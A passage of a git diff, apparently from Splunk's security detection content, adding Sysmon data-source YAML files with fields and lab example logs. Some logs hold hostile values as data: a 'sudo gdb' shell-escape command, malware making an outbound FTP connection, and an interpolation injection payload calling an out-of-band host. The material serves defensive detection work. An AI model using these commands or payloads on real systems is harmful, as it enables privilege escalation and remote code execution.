+  10:57:09.814</Data><Data Name='ProcessGuid'>{F522A29C-446D-63DA-9F01-00000000BB02}</Data><Data
+  Name='ProcessId'>2428</Data><Data Name='User'>ATTACKRANGE\Administrator</Data><Data
+  Name='Image'>C:\Temp\swiftslicer.exe</Data><Data Name='TargetFilename'>C:\Python311\vcruntime140_1.dll</Data><Data
+  Name='Hashes'>MD5=75E78E4BF561031D39F86143753400FF,SHA256=1758085A61527B427C4380F0C976D29A8BEE889F2AC480C356A3F166433BF70E,IMPHASH=BF380CA954CBF10D1A4CEF9EC18E46FD</Data><Data
+  Name='IsExecutable'>true</Data><Data Name='Archived'>false - insufficient disk space</Data></EventData></Event>
diff --git a/data_sources/sysmon_eventid_3.yml b/data_sources/sysmon_eventid_3.yml
new file mode 100644
index 0000000000..258a07fb4c
--- /dev/null
+++ b/data_sources/sysmon_eventid_3.yml
@@ -0,0 +1,120 @@
+name: Sysmon EventID 3
+id: 01d84dff-4e26-422c-9389-6a579ee6e75b
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 3
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- DestinationHostname
+- DestinationIp
+- DestinationIsIpv6
+- DestinationPort
+- DestinationPortName
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Image
+- Initiated
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- Protocol
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SourceHostname
+- SourceIp
+- SourceIsIpv6
+- SourcePort
+- SourcePortName
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- User
+- UserID
+- UtcTime
+- Version
+- action
+- app
+- creation_time
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_ip
+- dest_port
+- direction
+- dvc
+- dvc_ip
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- process_exec
+- process_guid
+- process_id
+- process_name
+- protocol
+- protocol_version
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- src_host
+- src_ip
+- src_port
+- state
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- transport
+- transport_dest_port
+- user
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>3</EventID><Version>5</Version><Level>4</Level><Task>3</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2022-09-15T12:56:22.958249300Z'/><EventRecordID>156837</EventRecordID><Correlation/><Execution
+  ProcessID='2684' ThreadID='1380'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-ctus-attack-range-403.attackrange.local</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2022-09-15
+  12:56:19.679</Data><Data Name='ProcessGuid'>{6820D070-1F1B-6323-E113-000000007402}</Data><Data
+  Name='ProcessId'>5728</Data><Data Name='Image'>C:\Temp\agent_tesla-deob.exe</Data><Data
+  Name='User'>ATTACKRANGE\Administrator</Data><Data Name='Protocol'>tcp</Data><Data
+  Name='Initiated'>true</Data><Data Name='SourceIsIpv6'>false</Data><Data Name='SourceIp'>10.0.1.14</Data><Data
+  Name='SourceHostname'>win-dc-ctus-attack-range-403.attackrange.local</Data><Data
+  Name='SourcePort'>61722</Data><Data Name='SourcePortName'>-</Data><Data Name='DestinationIsIpv6'>false</Data><Data
+  Name='DestinationIp'>41.77.117.236</Data><Data Name='DestinationHostname'>youssef5.genious.net</Data><Data
+  Name='DestinationPort'>21</Data><Data Name='DestinationPortName'>ftp</Data></EventData></Event>
diff --git a/data_sources/sysmon_eventid_5.yml b/data_sources/sysmon_eventid_5.yml
new file mode 100644
index 0000000000..2472edb510
--- /dev/null
+++ b/data_sources/sysmon_eventid_5.yml
@@ -0,0 +1,87 @@
+name: Sysmon EventID 5
+id: 556471bf-44fa-44e6-97e2-eb25416aeb6d
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 5
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- os
+- process
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>5</EventID><Version>3</Version><Level>4</Level><Task>5</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2021-03-16T14:01:44.008858500Z'/><EventRecordID>39965</EventRecordID><Correlation/><Execution
+  ProcessID='2784' ThreadID='3256'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-654.attackrange.local</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2021-03-16
+  14:01:44.004</Data><Data Name='ProcessGuid'>{26337912-BA32-6050-3506-00000000AE01}</Data><Data
+  Name='ProcessId'>8672</Data><Data Name='Image'>C:\Users\Public\steam.exe</Data></EventData></Event>
diff --git a/data_sources/sysmon_eventid_6.yml b/data_sources/sysmon_eventid_6.yml
new file mode 100644
index 0000000000..943e48837d
--- /dev/null
+++ b/data_sources/sysmon_eventid_6.yml
@@ -0,0 +1,91 @@
+name: Sysmon EventID 6
+id: eadc297a-c20c-45a1-8fac-74ad54019767
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 6
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Hashes
+- ImageLoaded
+- Keywords
+- Level
+- MD5
+- Name
+- Opcode
+- ProcessID
+- RecordID
+- RecordNumber
+- RuleName
+- SHA256
+- SecurityID
+- Signature
+- SignatureStatus
+- Signed
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- os
+- process_hash
+- process_path
+- punct
+- service_signature_exists
+- service_signature_verified
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>6</EventID><Version>4</Version><Level>4</Level><Task>6</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2022-04-04T17:37:04.643206900Z'/><EventRecordID>15708989</EventRecordID><Correlation/><Execution
+  ProcessID='2988' ThreadID='2408'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-mhaag-attack-range-702.attackrange.local</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2022-04-04
+  17:37:04.640</Data><Data Name='ImageLoaded'>C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sys</Data><Data
+  Name='Hashes'>MD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6</Data><Data
+  Name='Signed'>true</Data><Data Name='Signature'>Riverbed Technology, Inc.</Data><Data
+  Name='SignatureStatus'>Valid</Data></EventData></Event>
diff --git a/data_sources/sysmon_eventid_7.yml b/data_sources/sysmon_eventid_7.yml
new file mode 100644
index 0000000000..9cc83be7e4
--- /dev/null
+++ b/data_sources/sysmon_eventid_7.yml
@@ -0,0 +1,113 @@
+name: Sysmon EventID 7
+id: 45512fa5-4d55-4088-9d51-f4dedc16fdff
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 7
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- Channel
+- Company
+- Computer
+- Description
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- FileVersion
+- Guid
+- Hashes
+- IMPHASH
+- Image
+- ImageLoaded
+- Keywords
+- Level
+- MD5
+- Name
+- Opcode
+- OriginalFileName
+- ProcessGuid
+- ProcessID
+- ProcessId
+- Product
+- RecordID
+- RecordNumber
+- RuleName
+- SHA256
+- SecurityID
+- Signature
+- SignatureStatus
+- Signed
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- User
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- os
+- parent_process_exec
+- parent_process_guid
+- parent_process_id
+- parent_process_name
+- parent_process_path
+- process_exec
+- process_hash
+- process_name
+- process_path
+- punct
+- service_dll_signature_exists
+- service_dll_signature_verified
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>7</EventID><Version>3</Version><Level>4</Level><Task>7</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2023-09-12T08:06:31.445185300Z'/><EventRecordID>45273</EventRecordID><Correlation/><Execution
+  ProcessID='2464' ThreadID='2888'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2023-09-12
+  08:06:31.433</Data><Data Name='ProcessGuid'>{8814F3F5-1C07-6500-9600-000000000E03}</Data><Data
+  Name='ProcessId'>4440</Data><Data Name='Image'>C:\Users\Administrator\AppData\Local\Temp\server.exe</Data><Data
+  Name='ImageLoaded'>C:\Users\Administrator\AppData\Local\Temp\server.exe</Data><Data
+  Name='FileVersion'>-</Data><Data Name='Description'>-</Data><Data Name='Product'>-</Data><Data
+  Name='Company'>-</Data><Data Name='OriginalFileName'>-</Data><Data Name='Hashes'>MD5=696CBE2CB6F7FAC5ED6262BCA51238BB,SHA256=43005D86607DC94C7D378AA1B8844947BAA03860652F2F2340266061AF12E524,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744</Data><Data
+  Name='Signed'>false</Data><Data Name='Signature'>-</Data><Data Name='SignatureStatus'>Unavailable</Data><Data
+  Name='User'>ATTACKRANGE\Administrator</Data></EventData></Event>
diff --git a/data_sources/sysmon_eventid_8.yml b/data_sources/sysmon_eventid_8.yml
new file mode 100644
index 0000000000..8657567471
--- /dev/null
+++ b/data_sources/sysmon_eventid_8.yml
@@ -0,0 +1,105 @@
+name: Sysmon EventID 8
+id: df7a786c-ade0-48f0-8596-26f10d169f7d
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 8
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- NewThreadId
+- Opcode
+- ProcessID
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SourceImage
+- SourceProcessGuid
+- SourceProcessId
+- StartAddress
+- StartFunction
+- StartModule
+- SystemTime
+- System_Props_Xml
+- TargetImage
+- TargetProcessGuid
+- TargetProcessId
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- os
+- parent_process_exec
+- parent_process_guid
+- parent_process_id
+- parent_process_name
+- parent_process_path
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_address
+- src_function
+- src_module
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>8</EventID><Version>2</Version><Level>4</Level><Task>8</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2022-10-27T13:59:12.440938600Z'/><EventRecordID>362233</EventRecordID><Correlation/><Execution
+  ProcessID='2656' ThreadID='2360'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-ctus-attack-range-487.attackrange.local</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2022-10-27
+  13:59:12.427</Data><Data Name='SourceProcessGuid'>{3381F800-8EB0-635A-1306-000000008A02}</Data><Data
+  Name='SourceProcessId'>4864</Data><Data Name='SourceImage'>C:\Windows\SysWOW64\wermgr.exe</Data><Data
+  Name='TargetProcessGuid'>{3381F800-8085-635A-2701-000000008A02}</Data><Data Name='TargetProcessId'>5572</Data><Data
+  Name='TargetImage'>C:\Windows\System32\Taskmgr.exe</Data><Data Name='NewThreadId'>4964</Data><Data
+  Name='StartAddress'>0x0000000000C20000</Data><Data Name='StartModule'>-</Data><Data
+  Name='StartFunction'>-</Data></EventData></Event>
diff --git a/data_sources/sysmon_eventid_9.yml b/data_sources/sysmon_eventid_9.yml
new file mode 100644
index 0000000000..5fa985f0a0
--- /dev/null
+++ b/data_sources/sysmon_eventid_9.yml
@@ -0,0 +1,87 @@
+name: Sysmon EventID 9
+id: ae4a6a24-9b8c-4386-a7ac-677d7ad5bf09
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 9
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+  url: https://splunkbase.splunk.com/app/5709/
+  version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- Device
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- os
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider
+  Name='Microsoft-Windows-Sysmon' Guid='{5770385F-C22A-43E0-BF4C-06F5698FFBD9}'/><EventID>9</EventID><Version>2</Version><Level>4</Level><Task>9</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime='2022-02-25T12:25:33.375618100Z'/><EventRecordID>190607</EventRecordID><Correlation/><Execution
+  ProcessID='2724' ThreadID='2436'/><Channel>Microsoft-Windows-Sysmon/Operational</Channel><Computer>win-dc-tcontreras-attack-range-478.attackrange.local</Computer><Security
+  UserID='S-1-5-18'/></System><EventData><Data Name='RuleName'>-</Data><Data Name='UtcTime'>2022-02-25
+  12:25:33.359</Data><Data Name='ProcessGuid'>{414E8EDF-CABB-6218-F103-000000003702}</Data><Data
+  Name='ProcessId'>6068</Data><Data Name='Image'>C:\Temp\c.exe</Data><Data Name='Device'>\Device\HarddiskVolume1</Data></EventData></Event>
diff --git a/data_sources/sysmon_for_linux_eventid_1.yml b/data_sources/sysmon_for_linux_eventid_1.yml
new file mode 100644
index 0000000000..9ee369f5b8
--- /dev/null
+++ b/data_sources/sysmon_for_linux_eventid_1.yml
@@ -0,0 +1,116 @@
+name: Sysmon for Linux EventID 1
+id: 93643652-30fe-4941-a1f7-6454f2948660
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon for Linux EventID 1
+source: Syslog:Linux-Sysmon/Operational
+sourcetype: sysmon:linux
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon for Linux
+  url: https://splunkbase.splunk.com/app/6652
+  version: 1.0.0
+fields:
+- _time
+- Channel
+- CommandLine
+- Company
+- Computer
+- CurrentDirectory
+- Description
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- FileVersion
+- Guid
+- Hashes
+- Image
+- IntegrityLevel
+- Keywords
+- Level
+- LogonGuid
+- LogonId
+- Name
+- Opcode
+- OriginalFileName
+- ParentCommandLine
+- ParentImage
+- ParentProcessGuid
+- ParentProcessId
+- ParentUser
+- ProcessGuid
+- ProcessID
+- ProcessId
+- Product
+- RecordID
+- RuleName
+- SystemTime
+- System_Props_Xml
+- Task
+- TerminalSessionId
+- ThreadID
+- User
+- UserId
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- eventtype
+- host
+- index
+- linecount
+- original_file_name
+- os
+- parent_process
+- parent_process_exec
+- parent_process_guid
+- parent_process_id
+- parent_process_name
+- parent_process_path
+- process
+- process_current_directory
+- process_exec
+- process_guid
+- process_hash
+- process_id
+- process_integrity_level
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- vendor_product
+example_log: <Event><System><Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/><EventID>1</EventID><Version>5</Version><Level>4</Level><Task>1</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime="2022-08-09T10:42:47.749450000Z"/><EventRecordID>1926574</EventRecordID><Correlation/><Execution
+  ProcessID="1465" ThreadID="1465"/><Channel>Linux-Sysmon/Operational</Channel><Computer>ar-linux</Computer><Security
+  UserId="0"/></System><EventData><Data Name="RuleName">-</Data><Data Name="UtcTime">2022-08-09
+  10:42:47.757</Data><Data Name="ProcessGuid">{ec23eae3-3a27-62f2-085e-16549b550000}</Data><Data
+  Name="ProcessId">10268</Data><Data Name="Image">/usr/bin/sudo</Data><Data Name="FileVersion">-</Data><Data
+  Name="Description">-</Data><Data Name="Product">-</Data><Data Name="Company">-</Data><Data
+  Name="OriginalFileName">-</Data><Data Name="CommandLine">sudo gdb -nx -ex !sh -ex
+  quit</Data><Data Name="CurrentDirectory">/home/ubuntu</Data><Data Name="User">ubuntu</Data><Data
+  Name="LogonGuid">{ec23eae3-315b-62f2-e803-000000000000}</Data><Data Name="LogonId">1000</Data><Data
+  Name="TerminalSessionId">13</Data><Data Name="IntegrityLevel">no level</Data><Data
+  Name="Hashes">-</Data><Data Name="ParentProcessGuid">{ec23eae3-315b-62f2-4884-4ea587550000}</Data><Data
+  Name="ParentProcessId">15369</Data><Data Name="ParentImage">/bin/bash</Data><Data
+  Name="ParentCommandLine">-bash</Data><Data Name="ParentUser">ubuntu</Data></EventData></Event>
diff --git a/data_sources/sysmon_for_linux_eventid_11.yml b/data_sources/sysmon_for_linux_eventid_11.yml
new file mode 100644
index 0000000000..8276870f8a
--- /dev/null
+++ b/data_sources/sysmon_for_linux_eventid_11.yml
@@ -0,0 +1,88 @@
+name: Sysmon for Linux EventID 11
+id: 14672fed-235a-411f-8062-ace9696fb2af
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon for Linux EventID 11
+source: Syslog:Linux-Sysmon/Operational
+sourcetype: sysmon:linux
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon for Linux
+  url: https://splunkbase.splunk.com/app/6652
+  version: 1.0.0
+fields:
+- _time
+- Channel
+- Computer
+- CreationUtcTime
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RuleName
+- SystemTime
+- System_Props_Xml
+- TargetFilename
+- Task
+- ThreadID
+- User
+- UserId
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- eventtype
+- file_create_time
+- file_name
+- file_path
+- host
+- index
+- linecount
+- object_category
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- tag::object_category
+- timeendpos
+- timestartpos
+- user
+- vendor_product
+example_log: <Event><System><Provider Name="Linux-Sysmon" Guid="{ff032593-a8d3-4f13-b0d6-01fc615a0f97}"/><EventID>11</EventID><Version>2</Version><Level>4</Level><Task>11</Task><Opcode>0</Opcode><Keywords>0x8000000000000000</Keywords><TimeCreated
+  SystemTime="2021-12-20T16:07:17.927963000Z"/><EventRecordID>792913</EventRecordID><Correlation/><Execution
+  ProcessID="4372" ThreadID="4372"/><Channel>Linux-Sysmon/Operational</Channel><Computer>sysmonlinux-tcontreras-attack-range-4134</Computer><Security
+  UserId="0"/></System><EventData><Data Name="RuleName">-</Data><Data Name="UtcTime">2021-12-20
+  16:07:17.929</Data><Data Name="ProcessGuid">{ec2c97d1-6aa9-61c0-3038-618238560000}</Data><Data
+  Name="ProcessId">5256</Data><Data Name="Image">/opt/splunkforwarder/bin/splunkd</Data><Data
+  Name="TargetFilename">/opt/splunkforwarder/var/lib/splunk/modinputs/journald/sysmon.checkpoint.tmp.dbed9d351dcc1806</Data><Data
+  Name="CreationUtcTime">2021-12-20 16:07:17.929</Data><Data Name="User">root</Data></EventData></Event>
diff --git a/data_sources/web/AWS_Cloudfront.yml b/data_sources/web/AWS_Cloudfront.yml
deleted file mode 100644
index 4ddd55d184..0000000000
--- a/data_sources/web/AWS_Cloudfront.yml
+++ /dev/null
@@ -1,97 +0,0 @@
-name: AWS Cloudfront
-id: 780086dc-2384-45b6-ade7-56cb00105464
-author: Patrick Bareiss, Splunk
-source: aws
-sourcetype: aws:cloudfront:accesslogs
-supported_TA:
-  name: Splunk Add-on for Amazon Web Services (AWS)
-  version: 7.4.1
-  url: https://splunkbase.splunk.com/app/1876
-event_names: []
-fields:
-  - _time
-  - action
-  - app
-  - bytes
-  - bytes_in
-  - bytes_out
-  - c_ip
-  - c_port
-  - cached
-  - category
-  - client_ip
-  - cs_bytes
-  - cs_cookie
-  - cs_host
-  - cs_method
-  - cs_protocol
-  - cs_protocol_version
-  - cs_referer
-  - cs_uri_query
-  - cs_uri_stem
-  - cs_user_agent
-  - date
-  - date_hour
-  - date_mday
-  - date_minute
-  - date_month
-  - date_second
-  - date_wday
-  - date_year
-  - date_zone
-  - dest
-  - duration
-  - edge_location_name
-  - eventtype
-  - fle_encrypted_fields
-  - fle_status
-  - host
-  - http_content_type
-  - http_method
-  - http_user_agent
-  - http_user_agent_length
-  - index
-  - linecount
-  - punct
-  - response_time
-  - sc_bytes
-  - sc_content_len
-  - sc_content_type
-  - sc_range_end
-  - sc_range_start
-  - sc_status
-  - source
-  - sourcetype
-  - splunk_server
-  - src
-  - src_ip
-  - src_port
-  - ssl_cipher
-  - ssl_protocol
-  - status
-  - tag
-  - tag::eventtype
-  - time
-  - time_taken
-  - time_to_first_byte
-  - timeendpos
-  - timestartpos
-  - uri_path
-  - url
-  - url_domain
-  - url_length
-  - vendor_product
-  - x_edge_detail_result_type
-  - x_edge_location
-  - x_edge_request_id
-  - x_edge_response_result_type
-  - x_edge_result_type
-  - x_forwarded_for
-  - x_host_header
-example_log:
-  "2023-11-07\t16:58:21\tIAD55-P5\t921\t44.192.78.55\tGET\td3u5aue66f5ui4.cloudfront.net\t\
-  /plugins/servlet/com.jsos.shell/ShellServlet\t200\t-\tSlackbot-LinkExpanding%201.0%20(+https://api.slack.com/robots)\t\
-  -\t-\tLambdaGeneratedResponse\tsGwvFCkFU4qlMxatCoJRgW87P7Ee8bKQor3U6lRt6I6jaFvLC7vcPA==\t\
-  confluence.catjamfest.com\thttps\t232\t0.276\t-\tTLSv1.3\tTLS_AES_128_GCM_SHA256\t\
-  LambdaGeneratedResponse\tHTTP/1.1\t-\t-\t57232\t0.276\tLambdaGeneratedResponse\t\
-  text/html\t527\t-\t-"
diff --git a/data_sources/web/Bro.yml b/data_sources/web/Bro.yml
deleted file mode 100644
index 86eb037d76..0000000000
--- a/data_sources/web/Bro.yml
+++ /dev/null
@@ -1,75 +0,0 @@
-name: Bro
-id: c5d9612b-0ffd-44d3-8247-3cf3486ec5e2
-author: Patrick Bareiss, Splunk
-source: bro:http:json
-sourcetype: bro:http:json
-supported_TA: {}
-event_names: []
-fields:
-  - _time
-  - bytes
-  - bytes_in
-  - bytes_out
-  - dest
-  - dest_host
-  - dest_ip
-  - dest_port
-  - direction
-  - dvc
-  - eventtype
-  - flow_id
-  - host
-  - host_header
-  - http_content_type
-  - http_method
-  - http_user_agent
-  - http_user_agent_length
-  - id.orig_h
-  - id.orig_p
-  - id.resp_h
-  - id.resp_p
-  - id_orig_h
-  - id_orig_p
-  - id_resp_h
-  - index
-  - is_broadcast
-  - is_dest_internal_ip
-  - is_src_internal_ip
-  - linecount
-  - method
-  - product
-  - punct
-  - request_body_len
-  - resp_fuids
-  - resp_fuids{}
-  - resp_mime_types
-  - resp_mime_types{}
-  - response_body_len
-  - sensor_name
-  - site
-  - source
-  - sourcetype
-  - splunk_server
-  - src
-  - src_ip
-  - src_port
-  - status
-  - status_code
-  - status_msg
-  - tag
-  - tag::eventtype
-  - timestamp
-  - trans_depth
-  - ts
-  - uid
-  - uri
-  - uri_path
-  - uri_query
-  - url
-  - user_agent
-  - vendor
-  - vendor_product
-  - version
-example_log:
-  '{"ts":"2022-10-26T18:00:59.345538Z","uid":"CobZQ21IIZvzswjyjh","id.orig_h":"10.0.1.15","id.orig_p":16976,"id.resp_h":"10.0.1.20","id.resp_p":8080,"trans_depth":1,"method":"GET","host":"10.0.1.20","uri":"/?q=${url:UTF-8:https://10.0.1.20:8080.q.cdcnbmk03o13j77svqvgpu44hdbnhypcq.oast.site}","version":"1.1","user_agent":"Mozilla/5.0
